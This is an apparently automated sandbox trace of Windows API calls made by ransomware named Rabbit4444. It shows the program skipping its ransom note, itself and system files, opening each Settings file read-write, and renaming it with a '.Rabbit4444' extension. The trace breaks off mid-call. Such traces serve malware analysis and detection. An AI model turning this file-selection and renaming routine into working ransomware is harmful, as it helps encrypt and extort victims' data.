[0056.538] lstrcmpiW (lpString1="AAA_SettingsPageDataSenseOverview.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.538] lstrcmpiW (lpString1="AAA_SettingsPageDataSenseOverview.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.538] lstrcmpiW (lpString1="AAA_SettingsPageDataSenseOverview.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.538] lstrcmpiW (lpString1="AAA_SettingsPageDataSenseOverview.settingcontent-ms", lpString2=".") returned 1 [0056.538] lstrcmpiW (lpString1="AAA_SettingsPageDataSenseOverview.settingcontent-ms", lpString2="..") returned 1 [0056.538] lstrcmpiW (lpString1="AAA_SettingsPageDataSenseOverview.settingcontent-ms", lpString2="windows") returned -1 [0056.538] lstrcmpiW (lpString1="AAA_SettingsPageDataSenseOverview.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.539] lstrcmpiW (lpString1="AAA_SettingsPageDataSenseOverview.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.539] lstrcmpiW (lpString1="AAA_SettingsPageDataSenseOverview.settingcontent-ms", lpString2="boot") returned -1 [0056.539] lstrcmpiW (lpString1="AAA_SettingsPageDataSenseOverview.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.539] lstrcmpiW (lpString1="AAA_SettingsPageDataSenseOverview.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.539] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageDataSenseOverview.settingcontent-ms" | out: lpString1="AAA_SettingsPageDataSenseOverview.settingcontent-ms") returned="AAA_SettingsPageDataSenseOverview.settingcontent-ms" [0056.539] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageDataSenseOverview.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.539] lstrlenW (lpString="AAA_SettingsPageDataSenseOverview.settingcontent-ms") returned 51 [0056.539] lstrlenW (lpString="Rabbit4444") returned 10 [0056.539] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.539] lstrlenW (lpString=".dll") returned 4 [0056.539] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.539] lstrlenW (lpString=".lnk") returned 4 [0056.539] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.539] lstrlenW (lpString=".ini") returned 4 [0056.539] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.539] lstrlenW (lpString=".sys") returned 4 [0056.539] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.539] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageDataSenseOverview.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagedatasenseoverview.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.539] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.539] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14785026069) returned 1 [0056.540] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1092) returned 1 [0056.540] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0056.540] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0056.540] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x750, lpName=0x0) returned 0x298 [0056.541] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x70000 [0056.542] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.542] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.542] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.542] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0056.542] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.542] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0056.542] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.542] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.542] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14785278322) returned 1 [0056.542] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0056.542] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0056.542] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.542] CloseHandle (hObject=0x298) returned 1 [0056.542] CloseHandle (hObject=0x278) returned 1 [0056.542] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageDataSenseOverview.settingcontent-ms.Rabbit4444") returned 179 [0056.542] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageDataSenseOverview.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagedatasenseoverview.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageDataSenseOverview.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagedatasenseoverview.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.543] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c375eb, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf9c375eb, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x421, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageDevicesPen.settingcontent-ms", cAlternateFileName="AABBC2~1.SET")) returned 1 [0056.543] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPen.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.543] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPen.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.543] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPen.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.543] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPen.settingcontent-ms", lpString2=".") returned 1 [0056.543] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPen.settingcontent-ms", lpString2="..") returned 1 [0056.543] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPen.settingcontent-ms", lpString2="windows") returned -1 [0056.543] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPen.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.543] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPen.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.543] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPen.settingcontent-ms", lpString2="boot") returned -1 [0056.543] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPen.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.543] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPen.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.543] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageDevicesPen.settingcontent-ms" | out: lpString1="AAA_SettingsPageDevicesPen.settingcontent-ms") returned="AAA_SettingsPageDevicesPen.settingcontent-ms" [0056.543] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageDevicesPen.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.544] lstrlenW (lpString="AAA_SettingsPageDevicesPen.settingcontent-ms") returned 44 [0056.544] lstrlenW (lpString="Rabbit4444") returned 10 [0056.544] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.544] lstrlenW (lpString=".dll") returned 4 [0056.544] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.544] lstrlenW (lpString=".lnk") returned 4 [0056.544] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.544] lstrlenW (lpString=".ini") returned 4 [0056.544] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.544] lstrlenW (lpString=".sys") returned 4 [0056.544] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.544] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageDevicesPen.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagedevicespen.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.544] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.544] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14785500443) returned 1 [0056.544] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1057) returned 1 [0056.544] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0056.544] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0056.544] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0056.545] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0056.546] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.546] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0056.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.546] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.546] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.547] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.547] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.547] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0056.547] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14785750693) returned 1 [0056.547] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0056.547] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0056.547] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.547] CloseHandle (hObject=0x298) returned 1 [0056.547] CloseHandle (hObject=0x278) returned 1 [0056.547] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageDevicesPen.settingcontent-ms.Rabbit4444") returned 172 [0056.547] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageDevicesPen.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagedevicespen.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageDevicesPen.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagedevicespen.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.548] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa3d0e55, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xfa3d0e55, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageDevicesPrinters.settingcontent-ms", cAlternateFileName="AAE8DA~1.SET")) returned 1 [0056.548] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPrinters.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.548] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPrinters.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.548] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPrinters.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.548] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPrinters.settingcontent-ms", lpString2=".") returned 1 [0056.548] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPrinters.settingcontent-ms", lpString2="..") returned 1 [0056.548] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPrinters.settingcontent-ms", lpString2="windows") returned -1 [0056.548] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPrinters.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.548] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPrinters.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.548] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPrinters.settingcontent-ms", lpString2="boot") returned -1 [0056.548] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPrinters.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.548] lstrcmpiW (lpString1="AAA_SettingsPageDevicesPrinters.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.548] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageDevicesPrinters.settingcontent-ms" | out: lpString1="AAA_SettingsPageDevicesPrinters.settingcontent-ms") returned="AAA_SettingsPageDevicesPrinters.settingcontent-ms" [0056.548] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageDevicesPrinters.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.549] lstrlenW (lpString="AAA_SettingsPageDevicesPrinters.settingcontent-ms") returned 49 [0056.549] lstrlenW (lpString="Rabbit4444") returned 10 [0056.549] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.549] lstrlenW (lpString=".dll") returned 4 [0056.549] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.549] lstrlenW (lpString=".lnk") returned 4 [0056.549] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.549] lstrlenW (lpString=".ini") returned 4 [0056.549] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.549] lstrlenW (lpString=".sys") returned 4 [0056.549] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.549] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageDevicesPrinters.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagedevicesprinters.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.549] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.549] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14785994914) returned 1 [0056.549] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1082) returned 1 [0056.549] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0056.549] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0056.549] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0056.551] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0056.551] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.551] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0056.551] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.551] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.551] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.552] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.552] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.552] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0056.552] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14786259200) returned 1 [0056.552] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0056.552] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0056.552] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.552] CloseHandle (hObject=0x298) returned 1 [0056.552] CloseHandle (hObject=0x278) returned 1 [0056.552] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageDevicesPrinters.settingcontent-ms.Rabbit4444") returned 177 [0056.552] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageDevicesPrinters.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagedevicesprinters.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageDevicesPrinters.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagedevicesprinters.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.553] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa86f736, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xfa86f736, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms", cAlternateFileName="AAAB49~1.SET")) returned 1 [0056.553] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.553] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.553] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.553] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms", lpString2=".") returned 1 [0056.553] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms", lpString2="..") returned 1 [0056.553] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms", lpString2="windows") returned -1 [0056.553] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.553] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.553] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms", lpString2="boot") returned -1 [0056.553] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.553] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.553] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms" | out: lpString1="AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms") returned="AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms" [0056.553] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.554] lstrlenW (lpString="AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms") returned 62 [0056.554] lstrlenW (lpString="Rabbit4444") returned 10 [0056.554] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.554] lstrlenW (lpString=".dll") returned 4 [0056.554] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.554] lstrlenW (lpString=".lnk") returned 4 [0056.554] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.554] lstrlenW (lpString=".ini") returned 4 [0056.554] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.554] lstrlenW (lpString=".sys") returned 4 [0056.554] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.554] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageeaseofaccessclosedcaptioning.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.554] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.554] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14786520994) returned 1 [0056.555] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1147) returned 1 [0056.555] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0056.555] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0056.555] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x780, lpName=0x0) returned 0x298 [0056.556] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x780) returned 0x70000 [0056.557] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.557] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.557] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.557] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0056.557] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.557] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0056.557] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.557] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.557] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14786783413) returned 1 [0056.557] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0056.557] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0056.557] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.557] CloseHandle (hObject=0x298) returned 1 [0056.557] CloseHandle 